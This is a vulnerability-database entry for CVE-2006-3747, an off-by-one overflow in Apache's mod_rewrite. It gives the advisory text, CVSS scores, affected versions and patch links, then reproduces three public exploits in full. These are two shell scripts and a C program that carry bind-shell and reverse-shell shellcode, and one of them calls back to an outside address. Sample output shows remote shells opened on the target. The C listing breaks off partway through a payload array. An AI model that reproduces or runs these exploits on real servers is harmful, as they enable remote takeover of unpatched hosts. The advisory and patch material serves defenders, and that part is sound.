CVE-2006-3747
CVSS7.6
发布时间 :2006-07-28 14:02:00
修订时间 :2011-09-06 00:00:00
NMCOEPS    

[原文]Off-by-one error in the ldap scheme handling in the Rewrite module (mod_rewrite) in Apache 1.3 from 1.3.28, 2.0.46 and other versions before 2.0.59, and 2.2, when RewriteEngine is enabled, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted URLs that are not properly handled using certain rewrite rules.


[CNNVD]Apache mod_rewrite模块单字节缓冲区溢出漏洞(CNNVD-200607-497)

        Apache是一款开放源代码WEB服务程序。
        Apache的mod_rewrite模块在转义绝对URI主题时存在单字节缓冲区溢出漏洞,攻击者可能利用此漏洞在服务器上执行任意指令。
        mod_rewrite模块的escape_absolute_uri()函数分离LDAP URL中的令牌时,会导致在字符指针数组以外写入指向用户控制数据的指针,这样就可能完全控制受影响的主机。

- CVSS (基础分值)

CVSS分值: 7.6 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-189 [数值错误]

- CPE (受影响的平台与产品)

cpe:/a:apache:http_server:1.3.31Apache Software Foundation Apache HTTP Server 1.3.31
cpe:/a:apache:http_server:1.3.33Apache Software Foundation Apache HTTP Server 1.3.33
cpe:/a:apache:http_server:2.0.49Apache Software Foundation Apache HTTP Server 2.0.49
cpe:/a:apache:http_server:2.0.53Apache Software Foundation Apache HTTP Server 2.0.53
cpe:/a:apache:http_server:1.3.8Apache Software Foundation Apache HTTP Server 1.3.8
cpe:/a:apache:http_server:1.3.30Apache Software Foundation Apache HTTP Server 1.3.30
cpe:/o:ubuntu:ubuntu_linux:5.04
cpe:/a:apache:http_server:2.0.57Apache Software Foundation Apache HTTP Server 2.0.57
cpe:/a:apache:http_server:2.0.55Apache Software Foundation Apache HTTP Server 2.0.55
cpe:/a:apache:http_server:2.0.58Apache Software Foundation Apache HTTP Server 2.0.58
cpe:/a:apache:http_server:1.3.28Apache Software Foundation Apache HTTP Server 1.3.28
cpe:/a:apache:http_server:2.0.54Apache Software Foundation Apache HTTP Server 2.0.54
cpe:/a:apache:http_server:2.0.47Apache Software Foundation Apache HTTP Server 2.0.47
cpe:/a:apache:http_server:1.3.29Apache Software Foundation Apache HTTP Server 1.3.29
cpe:/a:apache:http_server:1.3.9Apache Software Foundation Apache HTTP Server 1.3.9
cpe:/a:apache:http_server:2.0.48Apache Software Foundation Apache HTTP Server 2.0.48
cpe:/a:apache:http_server:2.0.51Apache Software Foundation Apache HTTP Server 2.0.51
cpe:/a:apache:http_server:1.3.6Apache Software Foundation Apache HTTP Server 1.3.6
cpe:/a:apache:http_server:1.3.4Apache Software Foundation Apache HTTP Server 1.3.4
cpe:/a:apache:http_server:1.3.32Apache Software Foundation Apache HTTP Server 1.3.32
cpe:/a:apache:http_server:2.0.56Apache Software Foundation Apache HTTP Server 2.0.56
cpe:/a:apache:http_server:2.0.52Apache Software Foundation Apache HTTP Server 2.0.52
cpe:/a:apache:http_server:1.3.5Apache Software Foundation Apache HTTP Server 1.3.5
cpe:/a:apache:http_server:2.0.50Apache Software Foundation Apache HTTP Server 2.0.50
cpe:/o:ubuntu:ubuntu_linux:5.10
cpe:/a:apache:http_server:1.3.7Apache Software Foundation Apache HTTP Server 1.3.7
cpe:/a:apache:http_server:1.3.3Apache Software Foundation Apache HTTP Server 1.3.3
cpe:/a:apache:http_server:2.0.46Apache Software Foundation Apache HTTP Server 2.0.46
cpe:/a:apache:http_server:1.3.7::dev
cpe:/o:ubuntu:ubuntu_linux:6.06_lts

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3747
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3747
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200607-497
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/395412
(UNKNOWN)  CERT-VN  VU#395412
http://www.us-cert.gov/cas/techalerts/TA08-150A.html
(UNKNOWN)  CERT  TA08-150A
http://www.debian.org/security/2006/dsa-1132
(PATCH)  DEBIAN  DSA-1132
http://www.debian.org/security/2006/dsa-1131
(PATCH)  DEBIAN  DSA-1131
http://www.apache.org/dist/httpd/Announcement2.0.html
(VENDOR_ADVISORY)  CONFIRM  http://www.apache.org/dist/httpd/Announcement2.0.html
https://issues.rpath.com/browse/RPL-538
(UNKNOWN)  CONFIRM  https://issues.rpath.com/browse/RPL-538
http://xforce.iss.net/xforce/xfdb/28063
(UNKNOWN)  XF  apache-modrewrite-offbyone-bo(28063)
http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=18&ID=3117
(UNKNOWN)  CONFIRM  http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=18&ID=3117
http://www.vupen.com/english/advisories/2008/1697
(UNKNOWN)  VUPEN  ADV-2008-1697
http://www.vupen.com/english/advisories/2008/1246/references
(UNKNOWN)  VUPEN  ADV-2008-1246
http://www.vupen.com/english/advisories/2008/0924/references
(UNKNOWN)  VUPEN  ADV-2008-0924
http://www.vupen.com/english/advisories/2007/2783
(UNKNOWN)  VUPEN  ADV-2007-2783
http://www.vupen.com/english/advisories/2006/4868
(UNKNOWN)  VUPEN  ADV-2006-4868
http://www.vupen.com/english/advisories/2006/4300
(UNKNOWN)  VUPEN  ADV-2006-4300
http://www.vupen.com/english/advisories/2006/4207
(UNKNOWN)  VUPEN  ADV-2006-4207
http://www.vupen.com/english/advisories/2006/4015
(UNKNOWN)  VUPEN  ADV-2006-4015
http://www.vupen.com/english/advisories/2006/3995
(UNKNOWN)  VUPEN  ADV-2006-3995
http://www.vupen.com/english/advisories/2006/3884
(UNKNOWN)  VUPEN  ADV-2006-3884
http://www.vupen.com/english/advisories/2006/3282
(UNKNOWN)  VUPEN  ADV-2006-3282
http://www.vupen.com/english/advisories/2006/3264
(UNKNOWN)  VUPEN  ADV-2006-3264
http://www.vupen.com/english/advisories/2006/3017
(UNKNOWN)  VUPEN  ADV-2006-3017
http://www.ubuntu.com/usn/usn-328-1
(UNKNOWN)  UBUNTU  USN-328-1
http://www.securityfocus.com/bid/19204
(UNKNOWN)  BID  19204
http://www.securityfocus.com/archive/1/archive/1/450321/100/0/threaded
(UNKNOWN)  HP  SSRT061265
http://www.securityfocus.com/archive/1/archive/1/450321/100/0/threaded
(UNKNOWN)  HP  SSRT061265
http://www.securityfocus.com/archive/1/archive/1/445206/100/0/threaded
(UNKNOWN)  HP  HPSBUX02145
http://www.securityfocus.com/archive/1/archive/1/445206/100/0/threaded
(UNKNOWN)  HP  HPSBUX02145
http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060820 POC & exploit for Apache mod_rewrite off-by-one
http://www.securityfocus.com/archive/1/archive/1/441526/100/200/threaded
(UNKNOWN)  BUGTRAQ  20060728 rPSA-2006-0139-1 httpd mod_ssl
http://www.securityfocus.com/archive/1/archive/1/441487/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060728 Apache mod_rewrite Buffer Overflow Vulnerability
http://www.securityfocus.com/archive/1/archive/1/441485/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060728 [Announcement] Apache HTTP Server 2.2.3 (2.0.59, 1.3.37) Released
http://www.osvdb.org/27588
(UNKNOWN)  OSVDB  27588
http://www.openpkg.org/security/advisories/OpenPKG-SA-2006.015-apache.html
(UNKNOWN)  OPENPKG  OpenPKG-SA-2006.015
http://www.novell.com/linux/security/advisories/2006_43_apache.html
(UNKNOWN)  SUSE  SUSE-SA:2006:043
http://www-1.ibm.com/support/docview.wss?uid=swg27007951
(UNKNOWN)  CONFIRM  http://www-1.ibm.com/support/docview.wss?uid=swg27007951
http://www-1.ibm.com/support/docview.wss?uid=swg24013080
(UNKNOWN)  AIXAPAR  PK27875
http://www-1.ibm.com/support/docview.wss?uid=swg1PK29156
(UNKNOWN)  AIXAPAR  PK29156
http://www-1.ibm.com/support/docview.wss?uid=swg1PK29154
(UNKNOWN)  AIXAPAR  PK29154
http://svn.apache.org/viewvc?view=rev&revision=426144
(UNKNOWN)  MISC  http://svn.apache.org/viewvc?view=rev&revision=426144
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102663-1
(UNKNOWN)  SUNALERT  102663
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102662-1
(UNKNOWN)  SUNALERT  102662
http://securitytracker.com/id?1016601
(UNKNOWN)  SECTRACK  1016601
http://security.gentoo.org/glsa/glsa-200608-01.xml
(UNKNOWN)  GENTOO  GLSA-200608-01
http://secunia.com/advisories/23260
(VENDOR_ADVISORY)  SECUNIA  23260
http://secunia.com/advisories/23028
(VENDOR_ADVISORY)  SECUNIA  23028
http://secunia.com/advisories/22523
(VENDOR_ADVISORY)  SECUNIA  22523
http://secunia.com/advisories/22388
(VENDOR_ADVISORY)  SECUNIA  22388
http://secunia.com/advisories/22368
(VENDOR_ADVISORY)  SECUNIA  22368
http://secunia.com/advisories/22262
(VENDOR_ADVISORY)  SECUNIA  22262
http://secunia.com/advisories/21509
(VENDOR_ADVISORY)  SECUNIA  21509
http://secunia.com/advisories/21478
(VENDOR_ADVISORY)  SECUNIA  21478
http://secunia.com/advisories/21346
(VENDOR_ADVISORY)  SECUNIA  21346
http://secunia.com/advisories/21315
(VENDOR_ADVISORY)  SECUNIA  21315
http://secunia.com/advisories/21313
(VENDOR_ADVISORY)  SECUNIA  21313
http://secunia.com/advisories/21307
(VENDOR_ADVISORY)  SECUNIA  21307
http://secunia.com/advisories/21284
(VENDOR_ADVISORY)  SECUNIA  21284
http://secunia.com/advisories/21273
(VENDOR_ADVISORY)  SECUNIA  21273
http://secunia.com/advisories/21266
(VENDOR_ADVISORY)  SECUNIA  21266
http://secunia.com/advisories/21247
(VENDOR_ADVISORY)  SECUNIA  21247
http://secunia.com/advisories/21245
(VENDOR_ADVISORY)  SECUNIA  21245
http://secunia.com/advisories/21241
(VENDOR_ADVISORY)  SECUNIA  21241
http://secunia.com/advisories/21197
(VENDOR_ADVISORY)  SECUNIA  21197
http://marc.info/?l=bugtraq&m=130497311408250&w=2
(UNKNOWN)  HP  SSRT090208
http://marc.info/?l=bugtraq&m=130497311408250&w=2
(UNKNOWN)  HP  HPSBOV02683
http://lwn.net/Alerts/194228/
(UNKNOWN)  TRUSTIX  2006-0044
http://lists.grok.org.uk/pipermail/full-disclosure/2006-July/048271.html
(UNKNOWN)  FULLDISC  20060728 [Announcement] Apache HTTP Server 2.2.3 (2.0.59, 1.3.37) Released
http://lists.grok.org.uk/pipermail/full-disclosure/2006-July/048267.html
(UNKNOWN)  FULLDISC  20060728 Apache 1.3.29/2.X mod_rewrite Buffer Overflow Vulnerability CVE-2006-3747
http://kbase.redhat.com/faq/FAQ_68_8653.shtm
(UNKNOWN)  MISC  http://kbase.redhat.com/faq/FAQ_68_8653.shtm
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01428449
(UNKNOWN)  HP  HPSBMA02328
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01118771
(UNKNOWN)  HP  SSRT061275
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01118771
(UNKNOWN)  HP  HPSBMA02250
http://www.mandriva.com/security/advisories?name=MDKSA-2006:133
(UNKNOWN)  MANDRIVA  MDKSA-2006:133
http://securityreason.com/securityalert/1312
(UNKNOWN)  SREASON  1312
http://secunia.com/advisories/30430
(UNKNOWN)  SECUNIA  30430
http://secunia.com/advisories/29849
(UNKNOWN)  SECUNIA  29849
http://secunia.com/advisories/29420
(UNKNOWN)  SECUNIA  29420
http://secunia.com/advisories/26329
(UNKNOWN)  SECUNIA  26329
http://lists.apple.com/archives/security-announce/2008/Mar/msg00001.html
(UNKNOWN)  APPLE  APPLE-SA-2008-03-18
http://lists.apple.com/archives/security-announce/2008//May/msg00001.html
(UNKNOWN)  APPLE  APPLE-SA-2008-05-28
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01428449
(UNKNOWN)  HP  HPSBMA02328
http://docs.info.apple.com/article.html?artnum=307562
(UNKNOWN)  CONFIRM  http://docs.info.apple.com/article.html?artnum=307562

- 漏洞信息

Apache mod_rewrite模块单字节缓冲区溢出漏洞
高危 数字错误
2006-07-28 00:00:00 2009-08-31 00:00:00
远程  
        Apache是一款开放源代码WEB服务程序。
        Apache的mod_rewrite模块在转义绝对URI主题时存在单字节缓冲区溢出漏洞,攻击者可能利用此漏洞在服务器上执行任意指令。
        mod_rewrite模块的escape_absolute_uri()函数分离LDAP URL中的令牌时,会导致在字符指针数组以外写入指向用户控制数据的指针,这样就可能完全控制受影响的主机。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://www.debian.org/security/2005/dsa-1132
        http://www.debian.org/security/2005/dsa-1131
        http://security.gentoo.org/glsa/glsa-200608-01.xml
        

- 漏洞信息 (2237)

Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC (EDBID:2237)
multiple dos
2006-08-21 Verified
0 Jacobo Avariento
[点击下载] [点击下载]
#!/bin/sh
# Exploit for Apache mod_rewrite off-by-one.
# Vulnerability discovered by Mark Dowd.
# CVE-2006-3747
# 
# by jack <jack\x40gulcas\x2Eorg>
# 2006-08-20
#
# Thx to xuso for help me with the shellcode.
#
# I suppose that you've the "RewriteRule kung/(.*) $1" rule if not
# you must recalculate adressess.
#
# Shellcode is based on Taeho Oh bindshell on port 30464 and modified
# for avoiding apache url-escape.. Take a look is quite nice ;)
#
# Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at
# 0x0834ae77 for any other version/system find it.
#
# Gulcas rulez :P

echo -e "mod_rewrite apache off-by-one overflow"
echo    "by jack <jack\x40gulcas\x2eorg>\n\n"

if [ $# -ne 1 ] ; then
  echo "Usage: $0 webserver"
  exit
fi

host=$1

echo -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6\
%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\
%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\
%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\
%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\
%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\
%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\
%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\
%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\
%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\n\
Host: $host\r\n\r\n" | nc $host 80

# milw0rm.com [2006-08-21]
		

- 漏洞信息 (3680)

Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32) (EDBID:3680)
windows remote
2007-04-07 Verified
80 axis
[点击下载] [点击下载]
#!/bin/sh
# Exploit for Apache mod_rewrite off-by-one(Win32).
#
# by axis <axis@ph4nt0m>
# http://www.ph4nt0m.org
# 2007-04-06
#
# Tested on Apache 2.0.58 (Win32)
# Windows2003 CN SP1
#
# Vulnerable Apache Versions:
# * 1.3 branch: >1.3.28 and <1.3.37
# * 2.0 branch: >2.0.46 and <2.0.59
# * 2.2 branch: >2.2.0 and <2.2.3
#
#
# Vulnerability discovered by Mark Dowd.
# CVE-2006-3747
# 
# first POC by jack <jack\x40gulcas\x2Eorg>
# 2006-08-20
# http://www.milw0rm.com/exploits/2237
#
#
# 
# to successfully exploit the vuln,there are some conditions
# http://www.vuxml.org/freebsd/dc8c08c7-1e7c-11db-88cf-000c6ec775d9.html
# 
# 
# some compilers added padding to the stack, so they could not be exploited,like gcc under redhat
# 
# for more details about the vuln please see:
# http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded
# 
# 
# no opcodes needed under windows!
# it will directly run our shellcode
# 
# my apache config file
# [httpd.conf]:
# RewriteEngine on
# RewriteRule 1/(.*) $1
# RewriteLog "logs/rewrite.log"
# RewriteLogLevel 3
# 
# 
# Usage:
# [axis@security-lab2 xploits]$ sh mod_rewrite.sh 10.0.76.141
# mod_rewrite apache off-by-one overflow
# 
# [axis@opensystemX axis]$ nc -vv -n -l -p 1154
# listening on [any] 1154 ...
# connect to [x.x.x.111] from (UNKNOWN) [10.0.76.141] 4077
# Microsoft Windows [¡ã?¡À? 5.2.3790]
# (C) ¡ã?¨¨¡§?¨´¨®D 1985-2003 Microsoft Corp.
# 
# D:\Apache\Apache2>exit
# exit
#  sent 5, rcvd 100
# 
# 
# 
# shellcode µÄbadchar£¬ÎÒÕâÀïÓõģ¬Æäʵ²»ÐèÒªÄÇô¶à
# ÎÒ¸úµ½Á½¸öbadcharÊÇ 0x3fºÍ 0x0b ÆäËû¶¼ÊÇÒÔÇ°Éú³ÉshellcodeÏ°¹ßÐÔ±£ÁôµÄ
# 0x00 0x3a 0x22 0x3b 0x7d 0x7b 0x3c 0x3e 0x5c 0x5d 0x3f 0x0b
#


echo -e "mod_rewrite apache off-by-one overflow"


if [ $# -ne 1 ] ; then
  echo "Usage: $0 webserver"
  exit
fi

host=$1

#use ldap:// to trigger the vuln, "Ph4nt0m" is any arbitrary string
echo -ne "GET /1/ldap://ph4nt0m/`perl -e 'print "Ph4nt0m"x5'`\  
# %3f to trigger the vuln
%3fA%3fA%3f\    
#string "CCCC.." is any arbitrary string, use %3f to trigger the vuln
#%90 is the machine code we will jmp to(NOP),run shellcode from here
`perl -e 'print "C"x10'`%3fC%3f%90\    
# shellcode,reverse shell to 192.168.0.1 ,port 1154  alpha2 encoded
`perl -e 'print "\    
\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49\
\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x63\
\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x42\x32\x42\x41\x41\x32\
\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x69\x79\x79\x6c\x51\
\x7a\x6a\x4b\x50\x4d\x4d\x38\x6b\x49\x79\x6f\x49\x6f\x6b\x4f\x65\
\x30\x4c\x4b\x72\x4c\x45\x74\x51\x34\x4e\x6b\x71\x55\x77\x4c\x6c\
\x4b\x33\x4c\x64\x45\x33\x48\x64\x41\x5a\x4f\x4c\x4b\x72\x6f\x36\
\x78\x4c\x4b\x73\x6f\x45\x70\x66\x61\x4a\x4b\x53\x79\x4e\x6b\x44\
\x74\x4e\x6b\x73\x31\x38\x6e\x55\x61\x79\x50\x6c\x59\x6c\x6c\x4b\
\x34\x6f\x30\x74\x34\x34\x47\x59\x51\x5a\x6a\x76\x6d\x76\x61\x6f\
\x32\x5a\x4b\x79\x64\x55\x6b\x33\x64\x51\x34\x41\x38\x30\x75\x4b\
\x55\x6e\x6b\x33\x6f\x44\x64\x46\x61\x7a\x4b\x32\x46\x6e\x6b\x34\
\x4c\x42\x6b\x6e\x6b\x73\x6f\x77\x6c\x54\x41\x58\x6b\x43\x33\x74\
\x6c\x6c\x4b\x4d\x59\x50\x6c\x74\x64\x75\x4c\x52\x41\x6f\x33\x50\
\x31\x6b\x6b\x72\x44\x4c\x4b\x50\x43\x66\x50\x6c\x4b\x33\x70\x64\
\x4c\x6c\x4b\x74\x30\x65\x4c\x4e\x4d\x4e\x6b\x53\x70\x47\x78\x33\
\x6e\x51\x78\x4c\x4e\x52\x6e\x56\x6e\x58\x6c\x50\x50\x59\x6f\x79\
\x46\x70\x66\x62\x73\x75\x36\x75\x38\x66\x53\x64\x72\x42\x48\x53\
\x47\x32\x53\x50\x32\x71\x4f\x71\x44\x49\x6f\x48\x50\x52\x48\x5a\
\x6b\x48\x6d\x6b\x4c\x65\x6b\x70\x50\x4b\x4f\x68\x56\x61\x4f\x4e\
\x69\x4a\x45\x30\x66\x6e\x61\x78\x6d\x67\x78\x73\x32\x42\x75\x52\
\x4a\x75\x52\x6b\x4f\x7a\x70\x61\x78\x6b\x69\x55\x59\x6c\x35\x6e\
\x4d\x51\x47\x4b\x4f\x4e\x36\x70\x53\x50\x53\x56\x33\x76\x33\x43\
\x73\x32\x73\x31\x53\x52\x73\x6b\x4f\x4a\x70\x70\x68\x6f\x30\x6d\
\x78\x35\x50\x46\x61\x30\x66\x30\x68\x76\x64\x6c\x42\x33\x56\x70\
\x53\x4e\x69\x78\x61\x4c\x55\x75\x38\x4a\x4c\x58\x79\x4c\x6a\x73\
\x50\x53\x67\x6b\x4f\x6a\x76\x73\x5a\x72\x30\x73\x61\x53\x65\x4b\
\x4f\x6a\x70\x52\x46\x31\x7a\x52\x44\x73\x56\x50\x68\x51\x73\x50\
\x6d\x32\x4a\x62\x70\x51\x49\x47\x59\x6a\x6c\x6c\x49\x4b\x57\x42\
\x4a\x73\x74\x6d\x59\x6d\x32\x35\x61\x6f\x30\x48\x73\x4f\x5a\x6f\
\x65\x4c\x49\x39\x6d\x4b\x4e\x33\x72\x54\x6d\x6b\x4e\x33\x72\x34\
\x6c\x6c\x4d\x50\x7a\x57\x48\x4e\x4b\x4c\x6b\x6c\x6b\x71\x78\x32\
\x52\x6b\x4e\x6c\x73\x42\x36\x49\x6f\x73\x45\x65\x78\x6b\x4f\x6e\
\x36\x71\x4b\x42\x77\x43\x62\x53\x61\x76\x31\x70\x51\x30\x6a\x35\
\x51\x62\x71\x76\x31\x72\x75\x43\x61\x4b\x4f\x6e\x30\x73\x58\x4e\
\x4d\x7a\x79\x37\x75\x38\x4e\x31\x43\x4b\x4f\x4a\x76\x30\x6a\x39\
\x6f\x6b\x4f\x70\x37\x6b\x4f\x6e\x30\x45\x38\x39\x77\x54\x39\x79\
\x56\x71\x69\x79\x6f\x53\x45\x56\x64\x69\x6f\x69\x46\x6b\x4f\x62\
\x57\x6b\x4c\x4b\x4f\x6a\x70\x50\x68\x6a\x50\x6f\x7a\x37\x74\x43\
\x6f\x72\x73\x4b\x4f\x6a\x76\x79\x6f\x38\x50\x63\
"'`\
HTTP/1.0\r\n\
Host: $host\r\n\r\n" | nc -vv $host 80

# milw0rm.com [2007-04-07]
		

- 漏洞信息 (3996)

Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3) (EDBID:3996)
windows remote
2007-05-26 Verified
80 fabio/b0x
[点击下载] [点击下载]
/*
apache mod rewrite exploit (win32)

By: fabio/b0x (oc-192, old CoTS member)

Vuln details: http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded

Code: bind shell on port 4445, tested on apache 2.0.58 with mod_rewrite (windows 2003)
      original exploit (http://milw0rm.com/exploits/3680) only had a call back on 192.168.0.1, also
      was a little buggy, so shellcode was rewriten, thanks to http://metasploit.com/

Usage: ./apache hostname rewrite_path

Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard

Example: ./apache 192.168.0.253 test
[+]Preparing payload
[+]Connecting...
[+]Connected
[+]Sending...
[+]Sent
[+]Starting second stage...
[+]Connecting...
[+]Connected
[+]Sending...
[+]Sent
[+]Connecting to shell
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\Program Files\Apache Group\Apache2>exit
exit
[+]Owned
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define PORT 80 
#define PORT2 4444
#define MAXDATASIZE 1024
char get[] = "/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90";
char shellcode[]= 
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
"\x58\x50\x30\x42\x30\x41\x6b\x41\x41\x51\x41\x32\x41\x41\x32\x42"
"\x42\x42\x30\x42\x41\x58\x38\x41\x42\x50\x75\x7a\x49\x4b\x58\x56"
"\x36\x73\x30\x43\x30\x75\x50\x70\x53\x66\x35\x70\x56\x31\x47\x4c"
"\x4b\x50\x6c\x44\x64\x55\x48\x6c\x4b\x73\x75\x75\x6c\x4c\x4b\x61"
"\x44\x73\x35\x63\x48\x35\x51\x4b\x5a\x6c\x4b\x50\x4a\x37\x68\x6c"
"\x4b\x42\x7a\x77\x50\x37\x71\x4a\x4b\x6b\x53\x44\x72\x30\x49\x6e"
"\x6b\x44\x74\x6e\x6b\x56\x61\x68\x6e\x54\x71\x39\x6f\x6b\x4c\x70"
"\x31\x4b\x70\x6c\x6c\x67\x48\x6b\x50\x54\x34\x53\x37\x6b\x71\x68"
"\x4f\x44\x4d\x73\x31\x78\x47\x38\x6b\x38\x72\x45\x6b\x73\x4c\x31"
"\x34\x46\x74\x52\x55\x6b\x51\x6c\x4b\x63\x6a\x65\x74\x56\x61\x7a"
"\x4b\x32\x46\x4c\x4b\x76\x6c\x70\x4b\x4e\x6b\x30\x5a\x75\x4c\x67"
"\x71\x5a\x4b\x6e\x6b\x74\x44\x4e\x6b\x57\x71\x6b\x58\x68\x6b\x76"
"\x62\x50\x31\x4b\x70\x33\x6f\x53\x6e\x31\x4d\x63\x6b\x4b\x72\x65"
"\x58\x55\x50\x61\x4e\x31\x7a\x36\x50\x42\x79\x70\x64\x4e\x6b\x74"
"\x59\x6e\x6b\x43\x6b\x44\x4c\x4c\x4b\x51\x4b\x77\x6c\x4c\x4b\x35"
"\x4b\x6e\x6b\x31\x4b\x74\x48\x73\x63\x63\x58\x6c\x4e\x70\x4e\x44"
"\x4e\x78\x6c\x79\x6f\x4b\x66\x4d\x59\x6f\x37\x4b\x31\x78\x6c\x33"
"\x30\x77\x71\x73\x30\x47\x70\x36\x37\x53\x66\x51\x43\x4d\x59\x69"
"\x75\x39\x78\x56\x47\x57\x70\x37\x70\x37\x70\x6e\x70\x45\x51\x33"
"\x30\x37\x70\x4c\x76\x72\x39\x55\x48\x7a\x47\x6d\x74\x45\x49\x54"
"\x30\x4d\x39\x38\x65\x77\x39\x4b\x36\x50\x49\x6c\x64\x35\x4a\x52"
"\x50\x4f\x37\x6c\x64\x4c\x6d\x76\x4e\x4d\x39\x4b\x69\x45\x59\x49"
"\x65\x4e\x4d\x78\x4b\x4a\x4d\x6b\x4c\x77\x4b\x31\x47\x50\x53\x74"
"\x72\x61\x4f\x46\x53\x67\x42\x57\x70\x61\x4b\x6c\x4d\x42\x6b\x75"
"\x70\x70\x51\x6b\x4f\x7a\x77\x4b\x39\x4b\x6f\x4f\x79\x4f\x33\x4e"
"\x6d\x71\x65\x52\x34\x53\x5a\x53\x37\x30\x59\x50\x51\x66\x33\x4b"
"\x4f\x55\x64\x4c\x4f\x6b\x4f\x66\x35\x43\x34\x50\x59\x6e\x69\x47"
"\x74\x6c\x4e\x6a\x42\x58\x72\x54\x6b\x64\x67\x72\x74\x39\x6f\x76"
"\x57\x6b\x4f\x50\x55\x44\x70\x30\x31\x4b\x70\x50\x50\x30\x50\x50"
"\x50\x32\x70\x77\x30\x46\x30\x53\x70\x70\x50\x49\x6f\x63\x65\x66"
"\x4c\x4b\x39\x4f\x37\x30\x31\x6b\x6b\x33\x63\x71\x43\x42\x48\x54"
"\x42\x63\x30\x76\x71\x63\x6c\x4c\x49\x6d\x30\x52\x4a\x32\x30\x32"
"\x70\x36\x37\x59\x6f\x52\x75\x71\x34\x50\x53\x70\x57\x4b\x4f\x72"
"\x75\x44\x68\x61\x43\x62\x74\x33\x67\x59\x6f\x63\x65\x67\x50\x4c"
"\x49\x38\x47\x6d\x51\x5a\x4c\x53\x30\x36\x70\x53\x30\x33\x30\x4e"
"\x69\x4b\x53\x53\x5a\x43\x30\x72\x48\x53\x30\x34\x50\x33\x30\x33"
"\x30\x50\x53\x76\x37\x6b\x4f\x36\x35\x74\x58\x6e\x61\x4a\x4c\x67"
"\x70\x35\x54\x33\x30\x63\x30\x49\x6f\x78\x53\x41";


char finish[]= "HTTP/1.0\r\nHost: ";

char payload2[]=
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x18"
"\xd9\x03\x3a\x83\xeb\xfc\xe2\xf4\xe4\xb3\xe8\x77\xf0\x20\xfc\xc5"
"\xe7\xb9\x88\x56\x3c\xfd\x88\x7f\x24\x52\x7f\x3f\x60\xd8\xec\xb1"
"\x57\xc1\x88\x65\x38\xd8\xe8\x73\x93\xed\x88\x3b\xf6\xe8\xc3\xa3"
"\xb4\x5d\xc3\x4e\x1f\x18\xc9\x37\x19\x1b\xe8\xce\x23\x8d\x27\x12"
"\x6d\x3c\x88\x65\x3c\xd8\xe8\x5c\x93\xd5\x48\xb1\x47\xc5\x02\xd1"
"\x1b\xf5\x88\xb3\x74\xfd\x1f\x5b\xdb\xe8\xd8\x5e\x93\x9a\x33\xb1"
